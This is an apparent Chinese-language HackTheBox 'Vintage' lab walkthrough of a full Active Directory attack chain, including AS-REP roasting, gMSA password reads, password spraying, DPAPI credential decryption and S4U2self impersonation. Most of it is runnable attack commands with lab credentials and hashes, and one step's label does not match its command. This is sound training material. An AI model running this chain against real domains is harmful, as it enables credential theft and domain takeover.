HTB-Vintage域渗透实战教学文档<\/h1>

初始信息<\/h2>
初始凭据: P.Rosa \/ Rosaisbest123<\/code><\/li>
目标IP: 10.10.11.45<\/code><\/li>
域名: vintage.htb<\/code><\/li>
<\/ul>
信息收集阶段<\/h2>
端口扫描<\/h3>

快速扫描开放端口:<\/li>
<\/ol>
nmap -sT --min-rate 10000<\/span> -p- 10.10.11.45 -oA nmapscan\/port
<\/span><\/span><\/code><\/pre>
详细扫描开放端口:<\/li>
<\/ol>
grep open nmapscan\/port.nmap | awk -F'\/'<\/span> '{print $1}'<\/span> | paste -sd , | xargs nmap -sTVC -O -p
<\/span><\/span><\/code><\/pre>发现开放端口: 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389等<\/p>
LDAP服务枚举<\/h3>

基础信息收集:<\/li>
<\/ol>
ldapsearch -H ldap:\/\/10.10.11.45 -D "P.Rosa@vintage.htb"<\/span> -w "Rosaisbest123"<\/span> -b ''<\/span> -s base "(objectclass=user)"<\/span>
<\/span><\/span><\/code><\/pre>发现ldapServiceName: vintage.htb:dc01$@VINTAGE.HTB<\/code>，将其添加到\/etc\/hosts<\/code><\/p>

使用Windapsearch枚举用户:<\/li>
<\/ol>
python3 windapsearch.py --dc-ip 10.10.11.45 -u P.Rosa@vintage.htb -p Rosaisbest123 -U
<\/span><\/span><\/code><\/pre>获取用户列表:<\/p>
Administrator
Guest
krbtgt
M.Rossi
R.Verdi
L.Bianchi
G.Viola
C.Neri
P.Rosa
svc_sql
svc_ldap
svc_ark
C.Neri_adm
L.Bianchi_adm
<\/code><\/pre>
SMB服务利用<\/h3>

尝试Kerberos认证:<\/li>
<\/ol>
impacket-getTGT vintage.htb\/P.Rosa:'Rosaisbest123'<\/span> -dc-ip 10.10.11.45
<\/span><\/span>export KRB5CCNAME=<\/span>P.Rosa.ccache
<\/span><\/span><\/code><\/pre>
解决时间同步问题:<\/li>
<\/ol>
sudo timedatectl set-ntp off
<\/span><\/span>sudo rdate -n vintage.htb
<\/span><\/span><\/code><\/pre>
枚举RID:<\/li>
<\/ol>
netexec smb dc01.vintage.htb -d vintage.htb -k --use-kcache --rid-brute
<\/span><\/span><\/code><\/pre>Kerberos攻击<\/h3>

AS-REP Roasting攻击:<\/li>
<\/ol>
impacket-GetNPUsers -dc-ip 10.10.11.45 -no-pass -request -usersfile user_list vintage.htb\/
<\/span><\/span><\/code><\/pre>Bloodhound分析<\/h2>

收集数据:<\/li>
<\/ol>
bloodhound-python -c All -u P.Rosa -p Rosaisbest123 -ns 10.10.11.45 -d vintage.htb -dc dc01.vintage.htb --zip
<\/span><\/span><\/code><\/pre>
启动Bloodhound分析:<\/li>
<\/ol>
sudo neo4j restart
<\/span><\/span>bloodhound
<\/span><\/span><\/code><\/pre>发现FS01<\/code>属于WINDOWS 2000 Compatible Access<\/code>组，可作为突破点<\/p>
Pre2k枚举<\/h2>

使用pre2k枚举有效用户:<\/li>
<\/ol>
python3 pre2k.<\/span>py unauth -<\/span>d vintage.<\/span>htb -<\/span>dc-<\/span>ip dc01.<\/span>vintage.<\/span>htb -<\/span>inputfile user_list
<\/span><\/span><\/code><\/pre>发现FS01$<\/code>用户<\/p>

获取FS01$的TGT:<\/li>
<\/ol>
impacket-getTGT vintage.htb\/FS01$:fs01
<\/span><\/span>export KRB5CCNAME=<\/span>FS01\$<\/span>.ccache
<\/span><\/span><\/code><\/pre>域内关系利用<\/h2>

通过FS01$读取GMSA01密码:<\/li>
<\/ol>
bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB"<\/span> --dc-ip 10.10.11.45 -k get object 'GMSA01$'<\/span> --attr msDS-ManagedPassword
<\/span><\/span><\/code><\/pre>
获取GMSA01$的NTLM哈希:<\/li>
<\/ol>
impacket-getTGT vintage.htb\/GMSA01$ -hashes aad3b435b51404eeaad3b435b51404ee:a317f224b45046c1446372c4dc06ae53
<\/span><\/span>export KRB5CCNAME=<\/span>GMSA01\$<\/span>.ccache
<\/span><\/span><\/code><\/pre>
将GMSA01$加入SERVICEMANAGERS组:<\/li>
<\/ol>
bloodyAD --host dc01.vintage.htb -d "vintage.htb"<\/span> --dc-ip 10.10.11.45 -k add groupMember "SERVICEMANAGERS"<\/span> "GMSA01<\/span>$"<\/span>
<\/span><\/span><\/code><\/pre>
禁用svc_sql的预认证:<\/li>
<\/ol>
bloodyAD --host dc01.vintage.htb -d "vintage.htb"<\/span> --dc-ip 10.10.11.45 -k remove uac SVC_SQL -f ACCOUNTDISABLE
<\/span><\/span><\/code><\/pre>
再次AS-REP Roasting获取svc_sql的哈希:<\/li>
<\/ol>
impacket-GetNPUsers -dc-ip 10.10.11.45 -no-pass -request -usersfile user_list vintage.htb\/
<\/span><\/span><\/code><\/pre>
使用john破解哈希:<\/li>
<\/ol>
john --wordlist=<\/span>\/usr\/share\/wordlists\/rockyou.txt hash.txt
<\/span><\/span><\/code><\/pre>获得密码: Zer0the0ne<\/code><\/p>
密码喷洒攻击<\/h2>
.\/kerbrute_linux_amd64 passwordspray --dc 10.10.11.45 -d vintage.htb user_list Zer0the0ne
<\/span><\/span><\/code><\/pre>发现C.Neri:Zer0the0ne<\/code>和svc_sql:Zer0the0ne<\/code>有效<\/p>
DPAPI凭证提取<\/h2>

查找主密钥:<\/li>
<\/ol>
Get-ChildItem -Force C:\Users\C.Neri\AppData\Roaming\Microsoft\Protect\
<\/span><\/span>Get-ChildItem -Force C:\Users\C.Neri\AppData\Local\Microsoft\Protect\
<\/span><\/span><\/code><\/pre>
查找凭证文件:<\/li>
<\/ol>
Get-ChildItem -Force C:\Users\C.Neri\AppData\Local\Microsoft\Credentials\
<\/span><\/span>Get-ChildItem -Force C:\Users\C.Neri\AppData\Roaming\Microsoft\Credentials\
<\/span><\/span><\/code><\/pre>
解密主密钥:<\/li>
<\/ol>
impacket-dpapi masterkey -file 99cf41a3-a552-4cf7-a8d7-aca2d6f7339b -sid S-1-5-21-4024337825-2033394866-2055507597-1115 -password Zer0the0ne
<\/span><\/span><\/code><\/pre>
解密凭证:<\/li>
<\/ol>
impacket-dpapi credential -file C4BB96844A5C9DD45D5B6A9859252BA6 -key 0xf8901b2125dd10209da9f66562df2e68e89a48cd0278b48a37f510df01418e68b283c61707f3935662443d81c0d352f1bc8055523bf65b2d763191ecd44e525a
<\/span><\/span><\/code><\/pre>获得凭据: c.neri_adm:Uncr4ck4bl3P4ssW0rd0312<\/code><\/p>
S4U2SELF提权<\/h2>

查看svc_sql的SPN:<\/li>
<\/ol>
Get-ADUser -Identity svc_sql -Properties ServicePrincipalNames
<\/span><\/span><\/code><\/pre>
添加SPN:<\/li>
<\/ol>
bloodyAD --host dc01.vintage.htb -d "VINTAGE.HTB"<\/span> --dc-ip 10.10.11.45 -k set object "SVC_SQL"<\/span> servicePrincipalName -v "cifs\/test"<\/span>
<\/span><\/span><\/code><\/pre>
将svc_sql加入DELEGATEDADMINS组:<\/li>
<\/ol>
bloodyAD --host dc01.vintage.htb --dc-ip 10.10.11.45 -d "VINTAGE.HTB"<\/span> -u c.neri_adm -p 'Uncr4ck4bl3P4ssW0rd0312'<\/span> -k add groupMember "DELEGATEDADMINS"<\/span> "SVC_SQL"<\/span>
<\/span><\/span><\/code><\/pre>
获取L.BIANCHI_ADM的票据:<\/li>
<\/ol>
impacket-getST -spn 'cifs\/dc01.vintage.htb'<\/span> -impersonate L.BIANCHI_ADM -dc-ip 10.10.11.45 -k 'vintage.htb\/svc_sql:Zer0the0ne'<\/span>
<\/span><\/span><\/code><\/pre>
使用票据执行命令:<\/li>
<\/ol>
impacket-wmiexec -k -no-pass VINTAGE.HTB\/L.BIANCHI_ADM@dc01.vintage.htb
<\/span><\/span><\/code><\/pre>总结<\/h2>
本渗透测试通过以下关键路径完成:<\/p>

初始凭据P.Rosa\/Rosaisbest123<\/li>
发现FS01$用户并获取其TGT<\/li>
利用FS01\(读取GMSA01\)<\/span>密码<\/li>
通过GMSA01$控制SERVICEMANAGERS组<\/li>
禁用svc_sql预认证并获取其哈希<\/li>
密码喷洒获取C.Neri凭据<\/li>
DPAPI提取c.neri_adm凭据<\/li>
S4U2SELF模拟L.BIANCHI_ADM获取域控权限<\/li>
<\/ol>
关键工具:<\/p>

impacket套件<\/li>
Windapsearch<\/li>
Bloodhound<\/li>
bloodyAD<\/li>
Kerbrute<\/li>
DPAPI工具<\/li>
<\/ul>